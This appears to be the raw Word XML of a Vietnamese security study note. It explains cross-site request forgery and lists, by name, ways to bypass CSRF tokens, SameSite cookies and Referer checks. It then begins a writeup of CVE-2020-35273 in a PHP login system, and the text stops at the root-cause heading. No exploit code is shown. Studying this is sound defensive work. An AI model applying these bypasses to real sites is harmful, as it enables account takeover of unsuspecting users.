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A1FD" w14:textId="42C0BB25" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2667538F" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Khái niệm: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FD56F6" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C70601">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Giả mạo yêu cầu chéo trang (còn được gọi là CSRF) là một lỗ hổng bảo mật web cho phép kẻ tấn công dụ dỗ người dùng thực hiện các hành động mà họ không có ý định thực hiện. Nó cho phép kẻ tấn công tránh một phần chính sách cùng nguồn gốc, được thiết kế để ngăn các trang web khác nhau can thiệp lẫn nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FDF62E" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C70601">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trong một cuộc tấn công CSRF thành công, kẻ tấn công khiến người dùng nạn nhân thực hiện một hành động vô ý. Ví dụ, có thể là thay đổi địa chỉ email trên tài khoản của họ, thay đổi mật khẩu hoặc thực hiện chuyển tiền. Tùy thuộc vào bản chất của hành động, kẻ tấn công có thể giành được quyền kiểm soát hoàn toàn đối với tài khoản của người dùng. Nếu người dùng bị xâm phạm có vai trò đặc quyền trong ứng dụng, thì kẻ tấn công có thể giành được quyền kiểm soát hoàn toàn đối với tất cả dữ liệu và chức năng của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADA223E" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cách thức hoạt động</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D609510" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRPr="00C70601" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C70601">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Để có thể thực hiện một cuộc tấn công CSRF, ba điều kiện chính phải có:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D438045" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRPr="00C70601" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2135">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Một hành động có liên quan</w:t>
      </w:r>
      <w:r w:rsidRPr="00C70601">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C70601">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> Có một hành động trong ứng dụng mà kẻ tấn công có lý do để thực hiện. Đây có thể là hành động đặc quyền (chẳng hạn như sửa đổi quyền cho người dùng khác) hoặc bất kỳ hành động nào trên dữ liệu cụ thể của người dùng (chẳng hạn như thay đổi mật khẩu của chính người dùng).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219CC1D7" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRPr="00C70601" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2135">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Xử lý phiên dựa trên cookie.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C70601">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> Thực hiện hành động liên quan đến việc phát hành một hoặc nhiều yêu cầu HTTP và ứng dụng chỉ dựa vào cookie phiên để xác định người dùng đã thực hiện các yêu cầu. Không có cơ chế nào khác để theo dõi phiên hoặc xác thực yêu cầu của người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C528CE" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2135">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Không có tham số yêu cầu không thể đoán trước.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C70601">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Các yêu cầu thực hiện hành động không chứa bất kỳ tham số nào mà kẻ tấn công không thể xác định hoặc đoán giá trị. Ví dụ, khi khiến người dùng thay đổi mật </w:t>
      </w:r>
      <w:r w:rsidRPr="00C70601">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>khẩu, chức năng này không dễ bị tấn công nếu kẻ tấn công cần biết giá trị của mật khẩu hiện tại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BB1631" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRPr="00FF199B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cách thức khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4F27D8" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF199B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Xây dựng một URL hoặc một đoạn script để khai thác. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB885B3" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF199B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Lừa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nạn nhân</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF199B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> thực thi URL hoặc đoạn script trên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EE042A" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRPr="00FF199B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cách thức vượt qua các cơ chế bảo vệ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D227474" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070FA1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bỏ qua xác thực mã thông báo CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDA84FF" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00716A05">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Xác thực mã thông báo CSRF phụ thuộc vào phương thức yêu cầu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332CF20B" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00716A05">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Xác thực mã thông báo CSRF phụ thuộc vào sự hiện diện của mã thông báo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4E6DCE" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00716A05">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mã thông báo CSRF không được liên kết với phiên người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D76190" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00716A05">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mã thông báo CSRF được liên kết với cookie không phải phiên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC6901A" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00716A05">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mã thông báo CSRF chỉ được sao chép trong cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62931787" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070FA1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bỏ qua các hạn chế cookie SameSite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFA7DF8" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00716A05">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bỏ qua các hạn chế của SameSite Lax bằng cách sử dụng các yêu cầu GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BF6A77" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00716A05">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bỏ qua các hạn chế của SameSite bằng cách sử dụng các tiện ích on-site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556402C3" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00716A05">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bỏ qua các hạn chế của SameSite thông qua các miền dễ bị tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CAE122" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00716A05">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bỏ qua các hạn chế của SameSite Lax với các cookie mới được cấp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2BBD94" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070FA1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bỏ qua các biện pháp phòng thủ CSRF dựa trên Referer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B14A3B8" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00716A05">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Xác thực của Referer phụ thuộc vào việc tiêu đề có hiện diện hay không</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D9923B" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00716A05">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Xác thực của Người giới thiệu có thể bị bỏ qua</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CB8062" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2408E3C2" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04163DC8" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CVE-2020-35273</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644CCCE3" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384243">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Firmware info</w:t>
      </w:r>
      <w:r w:rsidRPr="006D728D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715D193F" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tên ứng dụng: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>User-Registration-and-Login-System-With-Admin-Panel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9E7E99" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C4CF5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Loại lỗ hổng: </w:t>
      </w:r>
      <w:r w:rsidRPr="00070FA1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cross Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6B7F09" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Phiên bản xây dựng: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>User-Registration-and-Login-System-With-Admin-Panel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F552BC" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRPr="00070FA1" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Liên kết tải xuống: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://github.com/EGavilan-Media/User-Registration-and-Login-System-With-Admin-Panel.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7673E7A9" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384243">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Description and Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578B37DA" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hệ thống đăng ký và đăng nhập người dùng EgavilanMedia với Bảng quản trị 1.0 bị ảnh hưởng bởi Cross Site Request Forgery (CSRF) để giành quyền từ xa trong bảng Hồ sơ người dùng. Kẻ tấn công có thể cập nhật bất kỳ tài khoản nào của người dùng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EA90F9" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384243">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Root-casue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC84DB7" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
